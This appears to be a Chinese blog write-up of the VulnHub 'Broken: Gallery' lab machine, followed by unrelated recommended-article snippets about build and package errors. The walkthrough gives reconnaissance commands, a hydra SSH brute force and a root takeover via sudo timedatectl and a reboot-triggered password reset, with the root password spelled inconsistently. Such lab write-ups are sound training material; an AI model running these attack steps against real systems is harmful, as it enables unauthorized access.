漏洞复现 -- Broken: Gallery

最新推荐文章于 2025-05-17 16:00:52 发布
最新推荐文章于 2025-05-17 16:00:52 发布
阅读量239 收藏
点赞数 3
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80854251/article/details/140062620
版权

一、靶机地址

https://www.vulnhub.com/entry/broken-gallery,344/

二、漏洞复现

kali : 192.168.159.128
靶机 : 192.168.159.145
sudo arp-scan -l
 # 探测⽬标主机

nmap -A 192.168.159.146
 # 对于扫出的IP地址进⾏端⼝扫描

dirsearch -u http://192.168.159.146
 # 对开放的80端⼝进⾏了探测,发现没有太⼤利⽤价值,只能把注意⼒转向22端⼝,尝试对22端⼝的ssh进⾏爆破

hydra -L rockyou.txt -P rockyou.txt 192.168.159.146 ssh
 # 成功爆破出账号密码
broken | broken

ssh broken@192.168.159.146
 # 远程连接ssh,成功登录

sudo -l
 # 查看当前⽤户的sudo权限,发现能够使⽤timedatectl和 reboot命令

ls -la
 # 尝试查看bash⽤户历史命令, 发现⼀个关键⽂件paddwordpolicy.sh位于/etc/init.d/⽬录下 

cat .bash_history 

cat /etc/init.d/password-policy.sh

 # 可以发现DAYOFWEEK等于4的时候,设置root⽤户的密码为TodayIsAgoogDay,其中DAYOPWEEK=$(date "+%u"),表示当前星期⼏,也就是说星期四的执⾏root⽤户密码的修改,通过timedatectl修改时间后重启

sudo timedatectl set-time '2015-11-20 16:14:50'
 # 使用 timedatectl 命令以超级用户权限设置系统时间为2015年11月20日16时14分50秒。

sudo /sbin/reboot
 # 使用 reboot 命令以超级用户权限重启系统。

ssh broken@192.168.159.146
 # 用SSH协议连接到IP地址为192.168.159.146的服务器,登录用户为broken。

su root
 # 切换到root用户。

使⽤ssh重新连接,然后切换到root⽤户,密码为“TodaylsAgoodDay”,因此我们使⽤它作为root登录,成功获得root权限

【VulnHub系列】BrokenGallery
Ms08067安全实验室
06-30 304
出品|MS08067实验室(www.ms08067.com)本文作者:大方子#01实验环境Kali:192.168.10.102MyFileServer:192.168.10.106#02实验过程通过arp-scan来发现靶机的IP地址sudo arp-scan --interface eth0 192.168.10.1/24用namp来扫描靶机的TCP端口和UDP端口开放情况# --min-ra...
vulnhub靶机 broken-gallery(渗透测试详解)
2301_78721909的博客
08-11 224
vulnhub靶机 broken-gallery(渗透测试详解)
broken靶机(计划任务提权)
m0_66299232的博客
11-27 494
9.虽然可以利用,但是他这个脚本只能看,不能改,然而之前的script文件夹可是满权限,那么就可以让这个log.py文件改名,让我们自己写的脚本变为log.py。5.这个root下面也有一个backup.py 应该是一样的脚本,根据前面的脚本信息,把/root写入path.txt就能把root目录给复制一份。3.查看path.txt啥也没有,退到根目录下(/和~不是一个目录)查看到一个backup.py的脚本。5.反弹成功之后,查看家目录下的alice用户,发现script目录是一个满权限的文件夹。
【vulnhub】Broken: Gallery靶机
wbplife的博客
08-12 310
尝试22端口的ssh进行爆破。尝试timedatectl。
Cannot resolve plugin org.apache.maven.plugins:maven-compiler-plugin:3.1 Clean up the broken artifa
ls_wifi的博客
12-10 3553
言简意赅,话不多说,直接上图: 记录一次创建maven项目的时候出现的bug,我以前也配过maven并没有遇到过这种问题,这回重新下载就出现这个问题了。我maven刚开始下的是3.8.4版本的也就是目前的最新版本,然后就出现了如上问题,而且我觉得我环境变量和settings.xml的配置以及IDEA整合maven的配置都没问题的,我还照着网上的大多数教程去修改阿里云镜像、关闭内网连热点、等方式都没用。我还以为是版本问题,就降级成了3.6.3,还是不行,之后我换成了3.5.4就可以了,然后我很纳闷不应该是版
sudo apt-get install 报错 software-properties-common : Depends: python3:any (>= 3.3.2-2~)
啷个哩个啷
10-15 8753
1. 问题描述 想使用sudo add-apt-repository ppa:openjdk-r/ppa这个命令,但是提示没有add-apt-repository命令,股进行安装 add-apt-repository 命令是software-properties-common包的一部分,因此安装这个包就OK了。 但是一度报错。。。> sudo apt-get install software-properties-common Reading package lists... Done Build
Ubuntu报错software-properties-common : Depends: python3-software-properties
qq_34168515的博客
07-17 6816
错误信息 sudo apt-get install -y apt-transport-https ca-certificates curl software-properties-common Reading package lists… Done Building dependency tree Reading state information… Done apt-transport-https is already the newest version (1.6.12ubuntu0.1). ca-ce
Quickmetasploit---Old---Broken:加快metasploit
05-21
Quickmetasploit 在python 2.7上运行运行install.sh以安装依赖项和符号链接运行install.sh之后,可以通过在shell中键入quickmetasploit来运行脚本。 运行update.sh以更新脚本
svelte-kit-broken-endpoints:在SvelteKit中复制与Endintint有关的错误
05-03
复制与SvelteKit中的端点有关的错误。 尝试启动开发服务器,然后运行以下命令: curl --request POST \ ... --header ' content-type: application/json ' \ --data ' { ...} ' 关于这个问题 每当src/setup.js的prepare...
electron-webpack-react-router-dom-hooks-broken:这个简单的示例演示了在电子Webpack设置的上下文中使用react-router-dom钩子导致的钩子规则错误
03-19
电子Webpack快速启动 一个基本的最小项目结构,即可开始使用进行开发。 多亏了electron-webpack的强大功能,该模板才配备了... 使用进行开发 renderer和main流程的HMR 使用根据您的electron版本自动配置的 ...
oh-no-broken-code:一些供学习Python的学生使用的破碎文件!
05-26
不好了!... 该存储库中有一些文件需要很多帮助。 您可以修复错误并添加缺少的代码吗? 难度顺序: icecream.py (列表) birthday.py (字典,如果) keyboard.py (缩进) github.py (在json文件中查找密钥) ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 374
shiro550反序列化
使用Spring Boot和Spring Security构建安全的RESTful API
最新发布
intwei的博客
05-17 327
本文详细介绍了如何使用Spring Boot和Spring Security构建安全的RESTful API,并结合JWT实现身份验证与授权。通过实际代码示例,帮助开发者快速上手。完整的项目代码可以在GitHub上找到。
安全巡检清单
yh
05-15 895
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 231
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 536
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
中大型水闸安全监测系统解决方案
weixin_48039531的博客
05-16 772
然而,由于历史原因,许多水闸存在建设标准偏低、质量较差、配套设施不完善等问题,加之受“重建轻管”思想影响,多数水闸建成后缺乏有效的管理和维修养护,存在较多的安全隐患,安全运行风险突出。现代化的水闸安全监测系统不仅能够实现实时监测、数据分析、预警报警等功能,还能够通过三维可视化技术,实现水闸运行状态、水流情况、水位变化等数据的直观展示,为管理决策提供更加科学、准确的依据。通过实时监控水闸的结构状态、水文数据和环境变化,可以及时发现潜在的风险和问题,从而采取相应的预防措施,确保水闸的稳定性和耐久性。
python3-rosdistro-modules : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 python3-rospkg-modules : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-ament-cmake-core : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-qt-gui : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-ros2doctor : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-ros2pkg : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-rqt-gui : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-rqt-msg : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-rqt-plot : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-rqt-publisher : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 ros-humble-rqt-shell : 依赖: python3-catkin-pkg-modules 但是它将不会被安装 E: 有未能满足的依赖关系。请尝试不指明软件包的名字来运行“apt --fix-broken install”(也可以指定一个解决办法)。
03-18
<think>好的,用户遇到了Python3 ROS相关模块因依赖问题无法安装的情况,具体是python3-catkin-pkg-modules未满足依赖导致ROS Humble组件的安装失败。我需要根据提供的引用信息来帮助用户解决这个问题。 首先,查看用户提供的引用内容。引用[1]提到了使用sudo apt download下载特定模块,引用[2]建议结合教程第4步,并提到可能需要手动安装依赖,引用[3]显示在处理.deb文件时出错,引用[4]比较了ROS1和ROS2的工作空间创建,指出ROS2使用colcon build。 用户的问题是关于ROS Humble,属于ROS2的版本。需要确认python3-catkin-pkg-modules在ROS2中的角色。ROS2中主要使用ament构建系统,但某些情况下可能仍需要catkin相关包,特别是当涉及到与ROS1的兼容或迁移时。 步骤一:更新系统软件包列表。这是解决依赖问题的常见第一步,确保所有仓库信息是最新的,使用sudo apt update。 步骤二:尝试修复损坏的包。使用sudo apt --fix-broken install可以自动处理依赖问题,可能解决因依赖链断裂导致的安装失败。 如果上述步骤无效,可能需要手动下载并安装缺失的包,如引用[1]中的方法。下载指定的.deb文件后,使用sudo dpkg -i安装,但需要注意可能出现的错误,如引用[3]中的dpkg错误。如果安装失败,可能需要先安装其依赖项,或者使用-f参数修复。 此外,引用[2]提到可能存在其他依赖问题,建议参考提供的链接或运行特定部分的命令。用户需要确保按照ROS Humble的官方安装指南操作,可能需要添加正确的ROS仓库源,确保所有依赖包可用。 如果问题仍然存在,可能需要清除apt缓存并重新下载,或者检查网络连接是否正常。最后,确保使用正确的ROS2构建命令,如colcon build,如引用[4]所述,而非catkin_make。 总结解决方案的步骤,确保逻辑清晰,用户能够逐步操作。同时,需要验证这些步骤是否适用于ROS Humble,可能需要查阅ROS2的官方文档确认相关包的名称和依赖关系。</think>### 分步解决方案:修复ROS Humble组件依赖问题 1. **更新软件包列表并修复基础依赖** ```bash sudo apt update sudo apt --fix-broken install ``` 这一步确保系统仓库信息最新,并自动修复已知的依赖冲突[^2]。 2. **手动下载并安装缺失的模块** 根据引用[1][^1]提供的包名,直接下载依赖文件: ```bash sudo apt download python3-catkin-pkg-modules python3-rospkg-modules ``` 随后安装下载的`.deb`文件: ```bash sudo dpkg -i python3-catkin-pkg-modules*.deb python3-rospkg-modules*.deb ``` 若安装过程中报错(如引用[3][^3]),尝试: ```bash sudo apt install -f # 自动修复未完成的安装 ``` 3. **重新安装ROS Humble相关组件** 确保已正确配置ROS Humble的APT源(参考[ROS2官方文档](https://docs.ros.org/en/humble/Installation.html)),然后执行: ```bash sudo apt install ros-humble-desktop # 或其他具体组件名 ``` 4. **验证工作空间构建工具** ROS2使用`colcon`替代ROS1的`catkin_make`(引用[4][^4]),确保已安装: ```bash sudo apt install python3-colcon-common-extensions ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值